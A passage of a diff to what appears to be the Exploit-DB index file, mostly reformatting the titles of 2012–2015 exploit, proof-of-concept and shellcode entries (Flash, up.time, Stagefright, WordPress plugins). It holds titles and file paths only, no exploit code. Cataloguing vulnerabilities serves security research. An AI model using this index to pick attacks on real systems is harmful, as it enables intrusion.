Handling",2015-08-19,"Google Security Research",linux,dos,0 -37870,platforms/linux/dos/37870.txt,"Adobe Flash Pointer Crash in XML Handling",2015-08-19,"Google Security Research",linux,dos,0 -37871,platforms/multiple/dos/37871.txt,"Adobe Flash Use-After-Free in swapDepths",2015-08-19,"Google Security Research",multiple,dos,0 -37872,platforms/multiple/dos/37872.txt,"Adobe Flash Bad Write in XML When Callback Modifies XML Tree During Property Delete",2015-08-19,"Google Security Research",multiple,dos,0 -37873,platforms/multiple/dos/37873.txt,"Adobe Flash Use-After-Free in createTextField",2015-08-19,"Google Security Research",multiple,dos,0 -37874,platforms/multiple/dos/37874.txt,"Adobe Flash Type Confusion in TextRenderer.setAdvancedAntialiasingTable",2015-08-19,"Google Security Research",multiple,dos,0 -37875,platforms/windows/dos/37875.txt,"Adobe Flash URL Resource Use-After-Free",2015-08-19,"Google Security Research",windows,dos,0 -37876,platforms/lin_x86-64/dos/37876.txt,"Adobe Flash XMLSocket Destructor Not Cleared Before Setting User Data in connect",2015-08-19,"Google Security Research",lin_x86-64,dos,0 -37877,platforms/multiple/dos/37877.txt,"Adobe Flash Use-After-Free in TextField.gridFitType",2015-08-19,"Google Security Research",multiple,dos,0 -37878,platforms/multiple/dos/37878.txt,"Adobe Flash: FileReference Class Type Confusion",2015-08-19,"Google Security Research",multiple,dos,0 -37879,platforms/lin_x86-64/dos/37879.txt,"Adobe Flash Heap-Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",lin_x86-64,dos,0 -37880,platforms/lin_x86-64/dos/37880.txt,"Adobe Flash Heap-Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",lin_x86-64,dos,0 -37881,platforms/win_x86/dos/37881.txt,"Adobe Flash Shared Object Type Confusion",2015-08-19,"Google Security Research",win_x86,dos,0 -37882,platforms/multiple/dos/37882.txt,"Adobe Flash Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",multiple,dos,0 -37883,platforms/windows/dos/37883.txt,"Adobe Flash AS2 Use-After-Free in TextField.filters",2015-08-19,bilou,windows,dos,0 +37865,platforms/multiple/dos/37865.txt,"Adobe Flash - attachMovie Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 +37866,platforms/linux/dos/37866.txt,"Adobe Flash - Pointer Crash in Drawing and Bitmap Handling",2015-08-19,"Google Security Research",linux,dos,0 +37867,platforms/linux/dos/37867.txt,"Adobe Flash - Pointer Crash After Continuing Slow Script",2015-08-19,"Google Security Research",linux,dos,0 +37868,platforms/linux/dos/37868.txt,"Adobe Flash - Bad Dereference at 0x23c on Linux x64",2015-08-19,"Google Security Research",linux,dos,0 +37869,platforms/linux/dos/37869.txt,"Adobe Flash - Pointer Crash in Button Handling",2015-08-19,"Google Security Research",linux,dos,0 +37870,platforms/linux/dos/37870.txt,"Adobe Flash - Pointer Crash in XML Handling",2015-08-19,"Google Security Research",linux,dos,0 +37871,platforms/multiple/dos/37871.txt,"Adobe Flash - swapDepths Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 +37872,platforms/multiple/dos/37872.txt,"Adobe Flash - Bad Write in XML When Callback Modifies XML Tree During Property Delete",2015-08-19,"Google Security Research",multiple,dos,0 +37873,platforms/multiple/dos/37873.txt,"Adobe Flash - createTextField Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 +37874,platforms/multiple/dos/37874.txt,"Adobe Flash - Type Confusion in TextRenderer.setAdvancedAntialiasingTable",2015-08-19,"Google Security Research",multiple,dos,0 +37875,platforms/windows/dos/37875.txt,"Adobe Flash - URL Resource Use-After-Free",2015-08-19,"Google Security Research",windows,dos,0 +37876,platforms/lin_x86-64/dos/37876.txt,"Adobe Flash - XMLSocket Destructor Not Cleared Before Setting User Data in connect",2015-08-19,"Google Security Research",lin_x86-64,dos,0 +37877,platforms/multiple/dos/37877.txt,"Adobe Flash - TextField.gridFitType Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 +37878,platforms/multiple/dos/37878.txt,"Adobe Flash - FileReference Class Type Confusion",2015-08-19,"Google Security Research",multiple,dos,0 +37879,platforms/lin_x86-64/dos/37879.txt,"Adobe Flash - Heap-Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",lin_x86-64,dos,0 +37880,platforms/lin_x86-64/dos/37880.txt,"Adobe Flash - Heap-Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",lin_x86-64,dos,0 +37881,platforms/win_x86/dos/37881.txt,"Adobe Flash - Shared Object Type Confusion",2015-08-19,"Google Security Research",win_x86,dos,0 +37882,platforms/multiple/dos/37882.txt,"Adobe Flash - Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",multiple,dos,0 +37883,platforms/windows/dos/37883.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free",2015-08-19,bilou,windows,dos,0 37884,platforms/windows/dos/37884.txt,"Adobe Flash - Heap Use-After-Free in SurfaceFilterList::C​reateFromScriptAtom",2015-08-19,bilou,windows,dos,0 37885,platforms/php/webapps/37885.html,"up.time 7.5.0 Superadmin Privilege Escalation Exploit",2015-08-19,LiquidWorm,php,webapps,9999 -37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999 +37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 - XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999 -37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999 +37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37889,platforms/linux/remote/37889.txt,"YingZhiPython - Directory Traversal / Arbitrary File Upload",2012-09-26,"Larry Cashdollar",linux,remote,0 37890,platforms/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Buffer Overflow",2015-08-20,metacom,windows,local,0 37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343 @@ -34229,7 +34229,7 @@ id,file,description,date,author,platform,type,port 37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80 37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0 37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin - 'id' Parameter Cross-Site Scripting",2012-09-26,"Scott Herbert",php,webapps,0 -37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 Denial of Service",2012-09-27,"Ryuzaki Lawlet",linux,dos,0 +37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 - Denial of Service",2012-09-27,"Ryuzaki Lawlet",linux,dos,0 37898,platforms/linux/local/37898.py,"Reaver Pro - Local Privilege Escalation",2012-09-30,infodox,linux,local,0 37899,platforms/php/webapps/37899.txt,"Switchvox Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0 37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x - Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0 @@ -34270,7 +34270,7 @@ id,file,description,date,author,platform,type,port 37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - (Cross-Site Scripting/HTML Injection/SQL Injection) Multiple Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0 37936,platforms/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Parameter Local File Inclusion",2012-10-06,L0n3ly-H34rT,php,webapps,0 37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 -37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 Remote Crash PoC",2015-08-24,"Shankar Damodaran",windows,dos,25 +37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 - Remote Crash PoC",2015-08-24,"Shankar Damodaran",windows,dos,25 37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - CSRF Add Admin Exploit",2015-08-24,"Arash Khazaei",php,webapps,80 37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80 37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash POC",2015-08-24,Un_N0n,windows,dos,0 @@ -34283,7 +34283,7 @@ id,file,description,date,author,platform,type,port 37964,platforms/windows/local/37964.c,"Broadcom WIDCOMM Bluetooth - 'btkrnl.sys' Driver Local Privilege Escalation",2012-10-18,"Nikita Tarakanov",windows,local,0 37965,platforms/hardware/webapps/37965.txt,"Keeper IP Camera 3.2.2.10 - Authentication Bypass",2015-08-25,"RAT - ThiefKing",hardware,webapps,0 37966,platforms/windows/dos/37966.txt,"Microsoft Office 2007 OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",windows,dos,0 -37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 Malformed Document Stack-Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0 +37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 - Malformed Document Stack-Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0 37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 - 'index.php' Script Cross-Site Scripting",2012-10-19,Netsparker,php,webapps,0 37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI Redirection",2012-10-21,"Aung Khant",hardware,remote,0 37970,platforms/php/webapps/37970.html,"WordPress Wordfence Security Plugin Cross-Site Scripting",2012-10-18,MustLive,php,webapps,0 @@ -34309,12 +34309,12 @@ id,file,description,date,author,platform,type,port 37991,platforms/php/webapps/37991.txt,"WANem Multiple Cross-Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",php,webapps,0 37992,platforms/php/webapps/37992.txt,"CorePlayer - 'callback' Parameter Cross-Site Scripting",2012-10-28,MustLive,php,webapps,0 37993,platforms/php/webapps/37993.txt,"Joomla! 'com_quiz' Component - SQL Injection",2012-10-30,"Daniel Barragan",php,webapps,0 -37994,platforms/php/webapps/37994.txt,"NetCat CMS Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 +37994,platforms/php/webapps/37994.txt,"NetCat CMS - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager - (IPAM) 'search.aspx' Cross-Site Scripting",2012-10-31,"Anthony Trummer",asp,webapps,0 37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'fileName' Parameter Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0 37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service",2015-08-28,Vulnerability-Lab,ios,dos,3030 37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80 -37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0 +37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross-Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0 38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 @@ -34323,7 +34323,7 @@ id,file,description,date,author,platform,type,port 38006,platforms/php/webapps/38006.txt,"bloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0 38007,platforms/php/webapps/38007.txt,"DCForum auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0 38008,platforms/php/webapps/38008.txt,"Joomla! com_parcoauto Component - 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0 -38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0 +38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS - Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0 38010,platforms/php/webapps/38010.txt,"VeriCentre Multiple SQL Injection",2012-11-06,"Cory Eubanks",php,webapps,0 38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' Parameter SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0 38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin - 'id' Parameter SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 @@ -34334,7 +34334,7 @@ id,file,description,date,author,platform,type,port 38017,platforms/php/webapps/38017.txt,"WordPress Kakao Theme - 'ID' Parameter SQL Injection",2012-11-09,sil3nt,php,webapps,0 38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin - 'cid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin - 'eid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 -38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products Password Encryption Weakness",2012-11-13,"Roberto Paleari",hardware,remote,0 +38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products - Password Encryption Weakness",2012-11-13,"Roberto Paleari",hardware,remote,0 38021,platforms/multiple/dos/38021.pl,"Media Player Classic 1.5 - (MPC) WebServer Request Handling Remote DoS",2012-11-16,X-Cisadane,multiple,dos,0 38022,platforms/php/webapps/38022.txt,"WordPress Dailyedition-mouss Theme - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 38023,platforms/php/webapps/38023.txt,"WordPress Tagged Albums Plugin - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 @@ -34350,8 +34350,8 @@ id,file,description,date,author,platform,type,port 38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0 38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0 38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements - 'Rootpipe' Privilege Escalation",2015-08-31,Metasploit,osx,local,0 -38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 Cross Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0 -38038,platforms/multiple/dos/38038.txt,"Splunk 4.3.1 Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0 +38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 Cross-Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0 +38038,platforms/multiple/dos/38038.txt,"Splunk 4.3.1 - Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0 38039,platforms/php/webapps/38039.txt,"openSIS - 'modname' Parameter Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 38040,platforms/php/webapps/38040.txt,"ATutor - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0 38041,platforms/php/webapps/38041.txt,"WordPress Madebymilk Theme - 'id' Parameter SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0 @@ -34398,7 +34398,7 @@ id,file,description,date,author,platform,type,port 38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0 38090,platforms/php/webapps/38090.txt,"FireEye Appliance - Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443 38091,platforms/php/webapps/38091.php,"Elastix < 2.5 - PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0 -38100,platforms/hardware/remote/38100.txt,"Multiple Fortinet FortiWeb Appliances Multiple Cross-Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote,0 +38100,platforms/hardware/remote/38100.txt,"Multiple Fortinet FortiWeb Appliances - Multiple Cross-Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote,0 38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin - 'language' Parameter Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0 38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme - 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0 @@ -34421,10 +34421,10 @@ id,file,description,date,author,platform,type,port 38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0 38118,platforms/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XXE Injection",2015-09-09,"Alex Haynes",xml,webapps,0 38119,platforms/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - CSRF",2015-09-09,"Aryan Bayaninejad",php,webapps,0 -38120,platforms/php/dos/38120.txt,"PHP SplDoublyLinkedList unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 -38121,platforms/php/dos/38121.txt,"PHP GMP unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 -38122,platforms/php/dos/38122.txt,"PHP SplObjectStorage unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 -38123,platforms/php/dos/38123.txt,"PHP Session Deserializer Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 +38120,platforms/php/dos/38120.txt,"PHP - SplDoublyLinkedList unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 +38121,platforms/php/dos/38121.txt,"PHP GMP unserialize() - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 +38122,platforms/php/dos/38122.txt,"PHP - SplObjectStorage unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 +38123,platforms/php/dos/38123.txt,"PHP Session Deserializer - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0 38125,platforms/php/dos/38125.txt,"PHP - unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0 38126,platforms/osx/shellcode/38126.c,"OS-X/x86-64 - 4444/TPC port bind Nullfree shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0 @@ -34466,7 +34466,7 @@ id,file,description,date,author,platform,type,port 38163,platforms/php/webapps/38163.txt,"WordPress Uploader Plugin Arbitrary File Upload",2013-01-03,"Sammy FORGIT",php,webapps,0 38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0 38165,platforms/windows/dos/38165.txt,"IKEView.exe Fox beta 1 - Stack Buffer Overflow",2015-09-13,hyp3rlinx,windows,dos,0 -38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 Insecure Cookie Authentication Bypass",2012-12-31,Agd_Scorp,php,webapps,0 +38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 - Insecure Cookie Authentication Bypass",2012-12-31,Agd_Scorp,php,webapps,0 38167,platforms/php/webapps/38167.php,"WordPress Multiple WPScientist Themes Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0 38168,platforms/php/webapps/38168.txt,"TomatoCart - 'json.php' Security Bypass",2013-01-04,"Aung Khant",php,webapps,0 38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0 @@ -34522,7 +34522,7 @@ id,file,description,date,author,platform,type,port 38224,platforms/php/webapps/38224.txt,"ZeusCart 4.0 - SQL Injection",2015-09-17,"Curesec Research Team",php,webapps,80 38225,platforms/windows/dos/38225.txt,"VBox Satellite Express 2.3.17.3 - Arbitrary Write",2015-09-17,KoreLogic,windows,dos,0 38226,platforms/android/remote/38226.py,"Android libstagefright - Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",android,remote,0 -38227,platforms/windows/remote/38227.txt,"Microsoft Lync 2010 4.0.7577.0 User-Agent Header Handling Remote Arbitrary Command Execution",2013-01-11,"Christopher Emerson",windows,remote,0 +38227,platforms/windows/remote/38227.txt,"Microsoft Lync 2010 4.0.7577.0 - User-Agent Header Handling Remote Arbitrary Command Execution",2013-01-11,"Christopher Emerson",windows,remote,0 38228,platforms/php/webapps/38228.txt,"phpLiteAdmin - 'table' Parameter SQL Injection",2013-01-15,KedAns-Dz,php,webapps,0 38229,platforms/php/webapps/38229.txt,"IP.Gallery - 'img' Parameter SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 38230,platforms/multiple/remote/38230.txt,"Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities",2013-01-18,"Juan Caillava",multiple,remote,0 @@ -34542,7 +34542,7 @@ id,file,description,date,author,platform,type,port 38244,platforms/windows/local/38244.py,"Total Commander 8.52 - Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local,0 38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,hardware,webapps,0 38246,platforms/php/webapps/38246.txt,"iCart Pro - 'section' Parameter SQL Injection",2013-01-25,n3tw0rk,php,webapps,0 -38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV Information Disclosure",2013-01-29,"Alejandro Ramos",multiple,remote,0 +38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV - Information Disclosure",2013-01-29,"Alejandro Ramos",multiple,remote,0 38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0 38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 @@ -34596,8 +34596,8 @@ id,file,description,date,author,platform,type,port 38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0 38447,platforms/multiple/local/38447.pl,"libsndfile 1.0.25 - Heap Overflow",2015-10-13,"Marco Romano",multiple,local,0 38307,platforms/win_x86/dos/38307.txt,"Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos,0 -38308,platforms/hardware/remote/38308.txt,"TP-LINK TL-WR2543ND Admin Panel Multiple Cross Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0 -38309,platforms/php/webapps/38309.txt,"osCommerce Cross Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps,0 +38308,platforms/hardware/remote/38308.txt,"TP-LINK TL-WR2543ND Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0 +38309,platforms/php/webapps/38309.txt,"osCommerce Cross-Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps,0 38310,platforms/android/remote/38310.c,"Android 2.3.5 PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",android,remote,0 38311,platforms/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,php,webapps,0 38312,platforms/php/webapps/38312.txt,"AbanteCart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0 @@ -34613,7 +34613,7 @@ id,file,description,date,author,platform,type,port 38322,platforms/php/webapps/38322.txt,"CKEditor - 'posteddata.php' Cross-Site Scripting",2013-02-19,AkaStep,php,webapps,0 38323,platforms/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,php,webapps,80 38324,platforms/php/webapps/38324.txt,"WordPress Pretty Link Plugin Cross-Site Scripting",2013-02-20,hiphop,php,webapps,0 -38325,platforms/windows/remote/38325.txt,"Alt-N MDaemon WorldClient And WebAdmin Cross Site Request Forgery",2013-02-18,QSecure,windows,remote,0 +38325,platforms/windows/remote/38325.txt,"Alt-N MDaemon WorldClient And WebAdmin Cross-Site Request Forgery",2013-02-18,QSecure,windows,remote,0 38326,platforms/php/webapps/38326.txt,"Zenphoto - 'index.php' SQL Injection",2013-02-20,HosseinNsn,php,webapps,0 38327,platforms/php/webapps/38327.txt,"PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting",2013-02-21,TheMirkin,php,webapps,0 38328,platforms/php/webapps/38328.txt,"OpenEMR - 'site' Parameter Cross-Site Scripting",2013-02-21,"Gjoko Krstic",php,webapps,0 @@ -34632,7 +34632,7 @@ id,file,description,date,author,platform,type,port 38341,platforms/windows/remote/38341.py,"BisonWare BisonFTP Server 3.5 - Directory Traversal",2015-09-28,"Jay Turla",windows,remote,21 38342,platforms/ios/webapps/38342.txt,"My.WiFi USB Drive 1.0 iOS - File Include",2015-09-28,Vulnerability-Lab,ios,webapps,8080 38343,platforms/ios/webapps/38343.txt,"Photos in Wifi 1.0.1 iOS - Arbitrary File Upload",2015-09-28,Vulnerability-Lab,ios,webapps,0 -38344,platforms/windows/dos/38344.txt,"Adobe Acrobat Reader AFParseDate Javascript API Restrictions Bypass",2015-09-28,"Reigning Shells",windows,dos,0 +38344,platforms/windows/dos/38344.txt,"Adobe Acrobat Reader - AFParseDate Javascript API Restrictions Bypass",2015-09-28,"Reigning Shells",windows,dos,0 38345,platforms/php/webapps/38345.txt,"Vtiger CRM 6.3.0 Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80 38346,platforms/bsd/remote/38346.rb,"Watchguard XCS Remote Command Execution",2015-09-28,Metasploit,bsd,remote,443 38347,platforms/bsd/local/38347.rb,"Watchguard XCS FixCorruptMail Local Privilege Escalation",2015-09-28,Metasploit,bsd,local,443 @@ -34661,7 +34661,7 @@ id,file,description,date,author,platform,type,port 38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 Web Interface - XML Injection",2015-10-01,neom22,hardware,webapps,0 38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0 38371,platforms/osx/local/38371.py,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0 -38372,platforms/php/webapps/38372.html,"Question2Answer Cross Site Request Forgery",2013-03-01,MustLive,php,webapps,0 +38372,platforms/php/webapps/38372.html,"Question2Answer Cross-Site Request Forgery",2013-03-01,MustLive,php,webapps,0 38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id HTML Injection",2013-03-08,"Aditya Balapure",php,webapps,0 38374,platforms/php/webapps/38374.txt,"SWFUpload Multiple Content Spoofing And Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics - 'warning' Parameter Cross-Site Scripting",2013-03-10,"Manuel García Cárdenas",php,webapps,0 @@ -34681,7 +34681,7 @@ id,file,description,date,author,platform,type,port 38390,platforms/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation",2013-03-13,"Sebastian Krahmer",linux,local,0 38391,platforms/php/webapps/38391.txt,"Petite Annonce Cross-Site Scripting",2013-03-14,Metropolis,php,webapps,0 38392,platforms/linux/dos/38392.txt,"MySQL and MariaDB Geometry Query Denial Of Service",2013-03-07,"Alyssa Milburn",linux,dos,0 -38393,platforms/php/webapps/38393.html,"WordPress Occasions Plugin Cross Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 +38393,platforms/php/webapps/38393.html,"WordPress Occasions Plugin Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard - '.PLF' File Remote Buffer Overflow",2013-03-19,metacom,windows,remote,0 38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080 38536,platforms/hardware/remote/38536.txt,"Barracuda SSL VPN 680 - 'returnTo' Parameter Open Redirection",2013-05-27,"Chokri Ben 